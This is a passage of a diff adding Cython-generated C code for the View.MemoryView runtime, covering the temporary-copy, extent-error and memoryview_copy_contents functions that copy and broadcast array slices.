order, ndim): + */ + (__pyx_v_tmpslice->strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + } + } + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + __pyx_t_2 = __pyx_memviewslice_is_contig((__pyx_v_src[0]), __pyx_v_order, __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1238 + * + * if slice_is_contig(src[0], order, ndim): + * memcpy(result, src.data, size) # <<<<<<<<<<<<<< + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + */ + (void)(memcpy(__pyx_v_result, __pyx_v_src->data, __pyx_v_size)); + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":1240 + * memcpy(result, src.data, size) + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) # <<<<<<<<<<<<<< + * + * return result + */ + /*else*/ { + copy_strided_to_strided(__pyx_v_src, __pyx_v_tmpslice, __pyx_v_ndim, __pyx_v_itemsize); + } + __pyx_L9:; + + /* "View.MemoryView":1242 + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.copy_data_to_temp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + +static int __pyx_memoryview_err_extents(int __pyx_v_i, Py_ssize_t __pyx_v_extent1, Py_ssize_t __pyx_v_extent2) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + Py_UCS4 __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_extents", 0); + + /* "View.MemoryView":1249 + * cdef int _err_extents(int i, Py_ssize_t extent1, + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_dim') + */ + __pyx_t_1 = PyTuple_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_3 = 127; + __Pyx_INCREF(__pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_2 += 35; + __Pyx_GIVEREF(__pyx_kp_u_got_differing_extents_in_dimensi); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_4 = __Pyx_PyUnicode_From_int(__pyx_v_i, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_got); + __pyx_t_2 += 6; + __Pyx_GIVEREF(__pyx_kp_u_got); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_kp_u_got); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent1, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_and); + __pyx_t_2 += 5; + __Pyx_GIVEREF(__pyx_kp_u_and); + PyTuple_SET_ITEM(__pyx_t_1, 4, __pyx_kp_u_and); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent2, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 5, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_2 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_1, 6, __pyx_kp_u__7); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_1, 7, __pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_4, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 1249, __pyx_L1_error) + + /* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView._err_extents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + +static int __pyx_memoryview_err_dim(PyObject *__pyx_v_error, PyObject *__pyx_v_msg, int __pyx_v_dim) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_dim", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1253 + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: + * raise error, msg % dim # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err') + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyString_FormatSafe(__pyx_v_msg, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_t_2, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(1, 1253, __pyx_L1_error) + + /* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._err_dim", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + +static int __pyx_memoryview_err(PyObject *__pyx_v_error, PyObject *__pyx_v_msg) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1257 + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: + * raise error, msg # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_no_memory') + */ + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_v_msg, 0, 0); + __PYX_ERR(1, 1257, __pyx_L1_error) + + /* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + +static int __pyx_memoryview_err_no_memory(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_no_memory", 0); + + /* "View.MemoryView":1261 + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: + * raise MemoryError # <<<<<<<<<<<<<< + * + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 1261, __pyx_L1_error) + + /* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err_no_memory", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice __pyx_v_src, __Pyx_memviewslice __pyx_v_dst, int __pyx_v_src_ndim, int __pyx_v_dst_ndim, int __pyx_v_dtype_is_object) { + void *__pyx_v_tmpdata; + size_t __pyx_v_itemsize; + int __pyx_v_i; + char __pyx_v_order; + int __pyx_v_broadcasting; + int __pyx_v_direct_copy; + __Pyx_memviewslice __pyx_v_tmp; + int __pyx_v_ndim; + int __pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + void *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1273 + * Check for overlapping memory and verify the shapes. + * """ + * cdef void *tmpdata = NULL # <<<<<<<<<<<<<< + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + */ + __pyx_v_tmpdata = NULL; + + /* "View.MemoryView":1274 + * """ + * cdef void *tmpdata = NULL + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + */ + __pyx_t_1 = __pyx_v_src.memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1276 + * cdef size_t itemsize = src.memview.view.itemsize + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) # <<<<<<<<<<<<<< + * cdef bint broadcasting = False + * cdef bint direct_copy = False + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_src), __pyx_v_src_ndim); + + /* "View.MemoryView":1277 + * cdef int i + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False # <<<<<<<<<<<<<< + * cdef bint direct_copy = False + * cdef __Pyx_memviewslice tmp + */ + __pyx_v_broadcasting = 0; + + /* "View.MemoryView":1278 + * cdef char order = get_best_order(&src, src_ndim) + * cdef bint broadcasting = False + * cdef bint direct_copy = False # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice tmp + * + */ + __pyx_v_direct_copy = 0; + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + __pyx_t_2 = (__pyx_v_src_ndim < __pyx_v_dst_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1282 + * + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_src), __pyx_v_src_ndim, __pyx_v_dst_ndim); + + /* "View.MemoryView":1281 + * cdef __Pyx_memviewslice tmp + * + * if src_ndim < dst_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + __pyx_t_2 = (__pyx_v_dst_ndim < __pyx_v_src_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1284 + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: + * broadcast_leading(&dst, dst_ndim, src_ndim) # <<<<<<<<<<<<<< + * + * cdef int ndim = max(src_ndim, dst_ndim) + */ + __pyx_memoryview_broadcast_leading((&__pyx_v_dst), __pyx_v_dst_ndim, __pyx_v_src_ndim); + + /* "View.MemoryView":1283 + * if src_ndim < dst_ndim: + * broadcast_leading(&src, src_ndim, dst_ndim) + * elif dst_ndim < src_ndim: # <<<<<<<<<<<<<< + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + */ + } + __pyx_L3:; + + /* "View.MemoryView":1286 + * broadcast_leading(&dst, dst_ndim, src_ndim) + * + * cdef int ndim = max(src_ndim, dst_ndim) # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + __pyx_t_3 = __pyx_v_dst_ndim; + __pyx_t_4 = __pyx_v_src_ndim; + if ((__pyx_t_3 > __pyx_t_4)) { + __pyx_t_5 = __pyx_t_3; + } else { + __pyx_t_5 = __pyx_t_4; + } + __pyx_v_ndim = __pyx_t_5; + + /* "View.MemoryView":1288 + * cdef int ndim = max(src_ndim, dst_ndim) + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + */ + __pyx_t_5 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_5; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) != (__pyx_v_dst.shape[__pyx_v_i])); + if (__pyx_t_2) { + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + __pyx_t_2 = ((__pyx_v_src.shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1291 + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: + * broadcasting = True # <<<<<<<<<<<<<< + * src.strides[i] = 0 + * else: + */ + __pyx_v_broadcasting = 1; + + /* "View.MemoryView":1292 + * if src.shape[i] == 1: + * broadcasting = True + * src.strides[i] = 0 # <<<<<<<<<<<<<< + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) + */ + (__pyx_v_src.strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1290 + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: + * if src.shape[i] == 1: # <<<<<<<<<<<<<< + * broadcasting = True + * src.strides[i] = 0 + */ + goto __pyx_L7; + } + + /* "View.MemoryView":1294 + * src.strides[i] = 0 + * else: + * _err_extents(i, dst.shape[i], src.shape[i]) # <<<<<<<<<<<<<< + * + * if src.suboffsets[i] >= 0: + */ + /*else*/ { + __pyx_t_6 = __pyx_memoryview_err_extents(__pyx_v_i, (__pyx_v_dst.shape[__pyx_v_i]), (__pyx_v_src.shape[__pyx_v_i])); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1294, __pyx_L1_error) + } + __pyx_L7:; + + /* "View.MemoryView":1289 + * + * for i in range(ndim): + * if src.shape[i] != dst.shape[i]: # <<<<<<<<<<<<<< + * if src.shape[i] == 1: + * broadcasting = True + */ + } + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + __pyx_t_2 = ((__pyx_v_src.suboffsets[__pyx_v_i]) >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":1297 + * + * if src.suboffsets[i] >= 0: + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) # <<<<<<<<<<<<<< + * + * if slices_overlap(&src, &dst, ndim, itemsize): + */ + __pyx_t_6 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Dimension_d_is_not_direct, __pyx_v_i); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1297, __pyx_L1_error) + + /* "View.MemoryView":1296 + * _err_extents(i, dst.shape[i], src.shape[i]) + * + * if src.suboffsets[i] >= 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + */ + } + } + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + __pyx_t_2 = __pyx_slices_overlap((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + if (__pyx_t_2) { + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + __pyx_t_2 = (!__pyx_memviewslice_is_contig(__pyx_v_src, __pyx_v_order, __pyx_v_ndim)); + if (__pyx_t_2) { + + /* "View.MemoryView":1302 + * + * if not slice_is_contig(src, order, ndim): + * order = get_best_order(&dst, ndim) # <<<<<<<<<<<<<< + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + */ + __pyx_v_order = __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim); + + /* "View.MemoryView":1301 + * if slices_overlap(&src, &dst, ndim, itemsize): + * + * if not slice_is_contig(src, order, ndim): # <<<<<<<<<<<<<< + * order = get_best_order(&dst, ndim) + * + */ + } + + /* "View.MemoryView":1304 + * order = get_best_order(&dst, ndim) + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) # <<<<<<<<<<<<<< + * src = tmp + * + */ + __pyx_t_7 = __pyx_memoryview_copy_data_to_temp((&__pyx_v_src), (&__pyx_v_tmp), __pyx_v_order, __pyx_v_ndim); if (unlikely(__pyx_t_7 == ((void *)NULL))) __PYX_ERR(1, 1304, __pyx_L1_error) + __pyx_v_tmpdata = __pyx_t_7; + + /* "View.MemoryView":1305 + * + * tmpdata = copy_data_to_temp(&src, &tmp, order, ndim) + * src = tmp # <<<<<<<<<<<<<< + * + * if not broadcasting: + */ + __pyx_v_src = __pyx_v_tmp; + + /* "View.MemoryView":1299 + * _err_dim(PyExc_ValueError, "Dimension %d is not direct", i) + * + * if slices_overlap(&src, &dst, ndim, itemsize): # <<<<<<<<<<<<<< + * + * if not slice_is_contig(src, order, ndim): + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (!__pyx_v_broadcasting); + if (__pyx_t_2) { + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'C', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1311 + * + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) # <<<<<<<<<<<<<< + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'C', __pyx_v_ndim); + + /* "View.MemoryView":1310 + * + * + * if slice_is_contig(src, 'C', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + */ + goto __pyx_L12; + } + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + __pyx_t_2 = __pyx_memviewslice_is_contig(__pyx_v_src, 'F', __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1313 + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): + * direct_copy = slice_is_contig(dst, 'F', ndim) # <<<<<<<<<<<<<< + * + * if direct_copy: + */ + __pyx_v_direct_copy = __pyx_memviewslice_is_contig(__pyx_v_dst, 'F', __pyx_v_ndim); + + /* "View.MemoryView":1312 + * if slice_is_contig(src, 'C', ndim): + * direct_copy = slice_is_contig(dst, 'C', ndim) + * elif slice_is_contig(src, 'F', ndim): # <<<<<<<<<<<<<< + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + */ + } + __pyx_L12:; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + if (__pyx_v_direct_copy) { + + /* "View.MemoryView":1317 + * if direct_copy: + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1318 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + */ + (void)(memcpy(__pyx_v_dst.data, __pyx_v_src.data, __pyx_memoryview_slice_get_size((&__pyx_v_src), __pyx_v_ndim))); + + /* "View.MemoryView":1319 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * free(tmpdata) + * return 0 + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1320 + * memcpy(dst.data, src.data, slice_get_size(&src, ndim)) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1321 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * free(tmpdata) + * return 0 # <<<<<<<<<<<<<< + * + * if order == 'F' == get_best_order(&dst, ndim): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":1315 + * direct_copy = slice_is_contig(dst, 'F', ndim) + * + * if direct_copy: # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + } + + /* "View.MemoryView":1307 + * src = tmp + * + * if not broadcasting: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = (__pyx_v_order == 'F'); + if (__pyx_t_2) { + __pyx_t_2 = ('F' == __pyx_get_best_slice_order((&__pyx_v_dst), __pyx_v_ndim)); + } + if (__pyx_t_2) { + + /* "View.MemoryView":1326 + * + * + * transpose_memslice(&src) # <<<<<<<<<<<<<< + * transpose_memslice(&dst) + * + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_src)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1326, __pyx_L1_error) + + /* "View.MemoryView":1327 + * + * transpose_memslice(&src) + * transpose_memslice(&dst) # <<<<<<<<<<<<<< + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + */ + __pyx_t_5 = __pyx_memslice_transpose((&__pyx_v_dst)); if (unlikely(__pyx_t_5 == ((int)-1))) __PYX_ERR(1, 1327, __pyx_L1_error) + + /* "View.MemoryView":1323 + * return 0 + * + * if order == 'F' == get_best_order(&dst, ndim): # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":1329 + * transpose_memslice(&dst) + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) # <<<<<<<<<<<<<< + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 0); + + /* "View.MemoryView":1330 + * + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) # <<<<<<<<<<<<<< + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + */ + copy_strided_to_strided((&__pyx_v_src), (&__pyx_v_dst), __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1331 + * refcount_copying(&dst, dtype_is_object, ndim, inc=False) + * copy_strided_to_strided(&src, &dst, ndim, itemsize) + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) # <<<<<<<<<<<<<< + * + * free(tmpdata) + */ + __pyx_memoryview_refcount_copying((&__pyx_v_dst), __pyx_v_dtype_is_object, __pyx_v_ndim, 1); + + /* "View.MemoryView":1333 + * refcount_copying(&dst, dtype_is_object, ndim, inc=True) + * + * free(tmpdata) # <<<<<<<<<<<<<< + * return 0 + * + */ + free(__pyx_v_tmpdata); + + /* "View.MemoryView":1334 + * 